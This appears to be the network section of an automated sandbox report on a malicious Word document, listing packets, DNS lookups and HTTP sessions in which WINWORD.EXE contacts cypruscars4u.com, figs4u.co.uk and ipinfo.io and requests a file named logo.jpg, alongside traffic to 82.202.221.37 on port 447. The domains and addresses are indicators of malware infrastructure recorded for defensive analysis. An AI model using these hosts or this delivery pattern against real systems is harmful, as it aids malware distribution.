Mai 25, 2018 16:10:03.181416035 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.181436062 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.183796883 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.183816910 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.183906078 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.183924913 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.225016117 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.225047112 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.225106001 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.225136995 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.237019062 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.237052917 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.237128019 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.237155914 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.300734043 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.300761938 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.300774097 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.300784111 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.300791979 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.300916910 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.300934076 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.300951958 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.300985098 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301067114 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.301198959 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301213026 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301219940 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301321030 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.301325083 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301337957 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301348925 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301357031 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301363945 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301456928 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.301471949 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301497936 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301508904 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301518917 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301525116 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301532030 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.301640987 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.301660061 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.303206921 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.303407907 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.369868994 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.369894981 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.369904995 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.369911909 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.369919062 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.369995117 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.369997025 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.370013952 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.370032072 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.370384932 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.371232033 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371269941 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371279001 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371388912 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.371423960 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371462107 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371476889 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371488094 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371498108 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371504068 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371577978 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.371604919 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371635914 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371648073 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371656895 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371664047 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371674061 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371742010 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371743917 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.371754885 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371769905 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371845007 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371855021 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.371965885 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.372006893 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.372512102 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.372531891 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.372595072 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.372616053 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.374778032 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.417319059 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.417339087 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.417346001 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.417357922 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.417368889 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.417450905 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.417459011 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.417465925 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.418626070 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.418657064 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419294119 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419313908 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419323921 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419429064 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419436932 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419446945 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419454098 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419461966 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.419627905 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.421231985 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.421276093 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.421291113 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.421298981 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.421305895 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.421314001 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.421345949 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.424896002 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.424956083 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.429785013 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.429802895 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.430563927 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.430609941 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.432471991 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.432487965 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.435178041 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.435229063 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.468894005 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.468916893 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.468928099 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.468936920 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.468945026 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.469042063 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.469039917 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.469054937 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.469067097 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.470278025 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.471843958 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.471860886 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.471868992 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.471986055 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.472009897 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.481590986 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.481627941 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.481640100 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.481647968 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.481656075 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.481750011 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.481765032 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.481867075 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.481898069 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.483587027 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.483608007 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.483618975 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.483690023 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.483710051 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.483755112 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.483766079 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.484101057 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.484119892 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.484249115 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.485115051 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.485136986 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529165030 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529200077 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529215097 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529232025 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529242992 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529422045 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.529433966 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529462099 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529479980 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529501915 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529508114 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.529515028 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529606104 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529613018 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.529623032 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529640913 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529653072 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529701948 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.529819965 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529836893 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529851913 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529866934 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529877901 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529896975 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.529913902 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529968023 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.529983044 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.530031919 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.530047894 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.530797958 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.531811953 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.531836033 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.532741070 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.532766104 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.541400909 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.541438103 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.541718006 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.541764975 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.544377089 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.544550896 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.544596910 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.575855970 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.576136112 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.576164961 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.593895912 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.593928099 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.593939066 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.593946934 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.593955040 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594080925 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594094038 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594105005 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594113111 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594157934 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.594187975 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594240904 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594254017 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594264030 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594271898 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594279051 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594366074 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.594399929 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594413996 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.594424009 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.595118999 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.596628904 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.596647024 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.596656084 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.599205017 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.599240065 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.725277901 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.725513935 MESZ	49197	447	192.168.1.16	82.202.221.37
Mai 25, 2018 16:10:03.725583076 MESZ	447	49197	82.202.221.37	192.168.1.16
Mai 25, 2018 16:10:03.923336983 MESZ	49197	447	192.168.1.16	82.202.221.37

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mai 25, 2018 16:04:03.729567051 MESZ	56975	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:04.004415035 MESZ	53	56975	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:04.917773008 MESZ	51208	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:05.048067093 MESZ	53	51208	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:05.056689978 MESZ	62228	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:05.186736107 MESZ	53	62228	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:14.249743938 MESZ	58659	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:14.400018930 MESZ	53	58659	8.8.8.8	192.168.1.16
Mai 25, 2018 16:04:14.404015064 MESZ	56917	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:04:14.562123060 MESZ	53	56917	8.8.8.8	192.168.1.16
Mai 25, 2018 16:05:02.503922939 MESZ	64970	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:05:02.820489883 MESZ	53	64970	8.8.8.8	192.168.1.16
Mai 25, 2018 16:06:13.921541929 MESZ	54618	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:06:14.069631100 MESZ	53	54618	8.8.8.8	192.168.1.16
Mai 25, 2018 16:06:14.071876049 MESZ	62396	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:06:14.214643955 MESZ	53	62396	8.8.8.8	192.168.1.16
Mai 25, 2018 16:09:08.120750904 MESZ	63638	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:09:08.860121012 MESZ	53	63638	8.8.8.8	192.168.1.16
Mai 25, 2018 16:09:08.884736061 MESZ	52877	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:09:09.165577888 MESZ	53	52877	8.8.8.8	192.168.1.16
Mai 25, 2018 16:09:15.084429026 MESZ	59362	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:09:15.469989061 MESZ	53	59362	8.8.8.8	192.168.1.16
Mai 25, 2018 16:09:15.485255003 MESZ	52261	53	192.168.1.16	8.8.8.8
Mai 25, 2018 16:09:15.771600008 MESZ	53	52261	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mai 25, 2018 16:04:03.729567051 MESZ	192.168.1.16	8.8.8.8	0xca40	Standard query (0)	cypruscars4u.com	A (IP address)	IN (0x0001)
Mai 25, 2018 16:04:04.917773008 MESZ	192.168.1.16	8.8.8.8	0xdd3d	Standard query (0)	cypruscars4u.com	A (IP address)	IN (0x0001)
Mai 25, 2018 16:04:05.056689978 MESZ	192.168.1.16	8.8.8.8	0xb529	Standard query (0)	cypruscars4u.com	A (IP address)	IN (0x0001)
Mai 25, 2018 16:04:14.249743938 MESZ	192.168.1.16	8.8.8.8	0xf6b6	Standard query (0)	cypruscars4u.com	A (IP address)	IN (0x0001)
Mai 25, 2018 16:04:14.404015064 MESZ	192.168.1.16	8.8.8.8	0xa1c9	Standard query (0)	cypruscars4u.com	A (IP address)	IN (0x0001)
Mai 25, 2018 16:05:02.503922939 MESZ	192.168.1.16	8.8.8.8	0xd203	Standard query (0)	figs4u.co.uk	A (IP address)	IN (0x0001)
Mai 25, 2018 16:06:13.921541929 MESZ	192.168.1.16	8.8.8.8	0xe3c1	Standard query (0)	cypruscars4u.com	A (IP address)	IN (0x0001)
Mai 25, 2018 16:06:14.071876049 MESZ	192.168.1.16	8.8.8.8	0x3469	Standard query (0)	cypruscars4u.com	A (IP address)	IN (0x0001)
Mai 25, 2018 16:09:08.120750904 MESZ	192.168.1.16	8.8.8.8	0xa9ff	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)
Mai 25, 2018 16:09:08.884736061 MESZ	192.168.1.16	8.8.8.8	0xe817	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Mai 25, 2018 16:04:04.004415035 MESZ	8.8.8.8	192.168.1.16	0xca40	No error (0)	cypruscars4u.com	87.247.241.143	A (IP address)	IN (0x0001)
Mai 25, 2018 16:04:05.048067093 MESZ	8.8.8.8	192.168.1.16	0xdd3d	No error (0)	cypruscars4u.com	87.247.241.143	A (IP address)	IN (0x0001)
Mai 25, 2018 16:04:05.186736107 MESZ	8.8.8.8	192.168.1.16	0xb529	No error (0)	cypruscars4u.com	87.247.241.143	A (IP address)	IN (0x0001)
Mai 25, 2018 16:04:14.400018930 MESZ	8.8.8.8	192.168.1.16	0xf6b6	No error (0)	cypruscars4u.com	87.247.241.143	A (IP address)	IN (0x0001)
Mai 25, 2018 16:04:14.562123060 MESZ	8.8.8.8	192.168.1.16	0xa1c9	No error (0)	cypruscars4u.com	87.247.241.143	A (IP address)	IN (0x0001)
Mai 25, 2018 16:05:02.820489883 MESZ	8.8.8.8	192.168.1.16	0xd203	No error (0)	figs4u.co.uk	87.247.241.143	A (IP address)	IN (0x0001)
Mai 25, 2018 16:06:14.069631100 MESZ	8.8.8.8	192.168.1.16	0xe3c1	No error (0)	cypruscars4u.com	87.247.241.143	A (IP address)	IN (0x0001)
Mai 25, 2018 16:06:14.214643955 MESZ	8.8.8.8	192.168.1.16	0x3469	No error (0)	cypruscars4u.com	87.247.241.143	A (IP address)	IN (0x0001)
Mai 25, 2018 16:09:08.860121012 MESZ	8.8.8.8	192.168.1.16	0xa9ff	No error (0)	ipinfo.io	216.239.34.21	A (IP address)	IN (0x0001)
Mai 25, 2018 16:09:09.165577888 MESZ	8.8.8.8	192.168.1.16	0xe817	No error (0)	ipinfo.io	216.239.34.21	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cypruscars4u.com

figs4u.co.uk

ipinfo.io

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.16	49188	87.247.241.143	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Mai 25, 2018 16:04:04.095504999 MESZ	0	OUT	OPTIONS / HTTP/1.1 User-Agent: Microsoft Office Protocol Discovery Host: cypruscars4u.com Content-Length: 0 Connection: Keep-Alive
Mai 25, 2018 16:04:04.198158979 MESZ	1	IN	HTTP/1.1 302 Found Date: Fri, 25 May 2018 14:04:04 GMT Server: Apache Location: http://cypruscars4u.com/wordpress Content-Length: 217 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 79 70 72 75 73 63 61 72 73 34 75 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://cypruscars4u.com/wordpress">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.16	49189	87.247.241.143	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Mai 25, 2018 16:04:05.189836979 MESZ	1	OUT	HEAD /logo.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft Office Existence Discovery Host: cypruscars4u.com
Mai 25, 2018 16:04:05.301259041 MESZ	2	IN	HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:04:05 GMT Server: Apache Last-Modified: Fri, 25 May 2018 10:39:39 GMT Accept-Ranges: bytes Content-Length: 55287 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg
